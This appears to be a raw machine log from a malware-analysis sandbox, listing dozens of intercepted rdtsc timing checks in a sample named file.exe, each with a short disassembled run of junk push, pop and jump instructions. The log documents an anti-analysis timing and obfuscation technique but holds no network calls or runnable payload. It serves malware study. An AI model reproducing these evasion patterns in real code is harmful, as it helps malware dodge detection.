Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1BB2 second address: 4B1BD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7E2CEC3D42h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1BD0 second address: 4B1BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7E2CEB1B16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7DF8 second address: 4B7DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B80AE second address: 4B80B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8EAF second address: 4B8ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007F7E2CEC3D36h 0x0000000e jng 00007F7E2CEC3D36h 0x00000014 jmp 00007F7E2CEC3D3Ch 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8ED0 second address: 4B8ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8ED8 second address: 4B8EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEC3D3Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8EED second address: 4B8EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8EF1 second address: 4B8EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B91A3 second address: 4B91C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7E2CEB1B16h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F7E2CEB1B1Dh 0x00000011 popad 0x00000012 jnc 00007F7E2CEB1B2Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9751 second address: 4B975F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F7E2CEC3D3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD7EB second address: 4BD7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7E2CEB1B22h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD7F7 second address: 4BD7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCE80 second address: 4BCE85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD259 second address: 4BD25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD3C2 second address: 4BD3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEB1B1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD3D1 second address: 4BD3DB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7E2CEC3D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD3DB second address: 4BD3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F7E2CEB1B22h 0x0000000c ja 00007F7E2CEB1B16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7C4A second address: 4C7C56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7E2CEC3D36h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7C56 second address: 4C7C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7C5A second address: 4C7C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7F0E second address: 4C7F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEB1B22h 0x00000009 jnc 00007F7E2CEB1B16h 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C81F3 second address: 4C81F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8380 second address: 4C8393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F7E2CEB1B1Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8393 second address: 4C8397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8640 second address: 4C8644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8644 second address: 4C865E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jnc 00007F7E2CEC3D36h 0x0000000f jmp 00007F7E2CEC3D3Ah 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C865E second address: 4C869D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7E2CEB1B22h 0x00000008 jnl 00007F7E2CEB1B16h 0x0000000e pop eax 0x0000000f jmp 00007F7E2CEB1B24h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 js 00007F7E2CEB1B22h 0x0000001c push ebx 0x0000001d push edi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C96DA second address: 4C96F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEC3D44h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C96F8 second address: 4C971C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F7E2CEB1B25h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C76BE second address: 4C76EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEC3D45h 0x00000009 popad 0x0000000a jmp 00007F7E2CEC3D44h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD79B second address: 4CD7A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD7A2 second address: 4CD7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E2CEC3D47h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2070 second address: 4D2077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2077 second address: 4D207C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D207C second address: 4D2084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DEACF second address: 4DEAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE6E7 second address: 4DE6F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE6F5 second address: 4DE738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Ah 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F7E2CEC3D3Ah 0x00000011 jno 00007F7E2CEC3D51h 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F7E2CEC3D36h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE738 second address: 4DE73C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E20D0 second address: 4E20D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E20D8 second address: 4E20EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7E2CEB1B16h 0x0000000a popad 0x0000000b jl 00007F7E2CEB1B1Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E20EB second address: 4E20EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E20EF second address: 4E210A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F7E2CEB1B21h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E1D37 second address: 4E1D87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D48h 0x00000007 jmp 00007F7E2CEC3D46h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7E2CEC3D48h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0591 second address: 4F05CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B24h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F7E2CEB1B2Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F05CA second address: 4F05FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CEC3D43h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7E2CEC3D3Ch 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F24A1 second address: 4F24A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC73D second address: 4FC743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC743 second address: 4FC747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB79A second address: 4FB7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB7A0 second address: 4FB7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50232E second address: 502342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jp 00007F7E2CEC3D36h 0x0000000c jbe 00007F7E2CEC3D36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50205F second address: 502063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5205E8 second address: 5205ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53882E second address: 538841 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538841 second address: 538846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538846 second address: 53884C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390C3 second address: 5390CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53AAB9 second address: 53AAC3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7E2CEB1B16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D39D second address: 53D3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D3A1 second address: 53D3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D481 second address: 53D486 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D675 second address: 53D6D8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7E2CEB1B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7E2CEB1B28h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F7E2CEB1B18h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d push 00000004h 0x0000002f jng 00007F7E2CEB1B1Ch 0x00000035 mov edx, dword ptr [ebp+122D2756h] 0x0000003b call 00007F7E2CEB1B19h 0x00000040 push esi 0x00000041 push eax 0x00000042 push edx 0x00000043 push ecx 0x00000044 pop ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D6D8 second address: 53D701 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jp 00007F7E2CEC3D44h 0x00000012 push ebx 0x00000013 jmp 00007F7E2CEC3D3Ch 0x00000018 pop ebx 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D701 second address: 53D706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D706 second address: 53D70C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D70C second address: 53D722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F7E2CEB1B16h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53DA04 second address: 53DA2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pushad 0x00000013 js 00007F7E2CEC3D36h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53DA2E second address: 53DA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E2CEB1B23h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53DA4F second address: 53DA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53DA53 second address: 53DA59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F22D second address: 53F233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53EDC3 second address: 53EDC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30047 second address: 4A3004D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A3004D second address: 4A300A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F7E2CEB1B1Bh 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F7E2CEB1B29h 0x0000001c adc ah, FFFFFFA6h 0x0000001f jmp 00007F7E2CEB1B21h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A300A7 second address: 4A300D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E2CEC3D48h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A300D9 second address: 4A300DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A300DD second address: 4A300E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10ED8 second address: 4A10EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10EDC second address: 4A10F58 instructions: 0x00000000 rdtsc 0x00000002 call 00007F7E2CEC3D3Ch 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f pushfd 0x00000010 jmp 00007F7E2CEC3D3Ah 0x00000015 or cx, 0D88h 0x0000001a jmp 00007F7E2CEC3D3Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 jmp 00007F7E2CEC3D44h 0x00000028 mov ax, 0601h 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f jmp 00007F7E2CEC3D3Ch 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov ecx, edx 0x0000003a jmp 00007F7E2CEC3D49h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10F58 second address: 4A10F68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEB1B1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50F49 second address: 4A50F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEC3D3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50F59 second address: 4A50F77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E2CEB1B23h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50F77 second address: 4A50FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F7E2CEC3D3Bh 0x0000000b sub cx, 546Eh 0x00000010 jmp 00007F7E2CEC3D49h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50FB3 second address: 4A50FB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50FB9 second address: 4A50FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A50FBF second address: 4A50FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0180 second address: 49F0184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0184 second address: 49F018A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10C0F second address: 4A10C15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10C15 second address: 4A10C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10C1B second address: 4A10C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
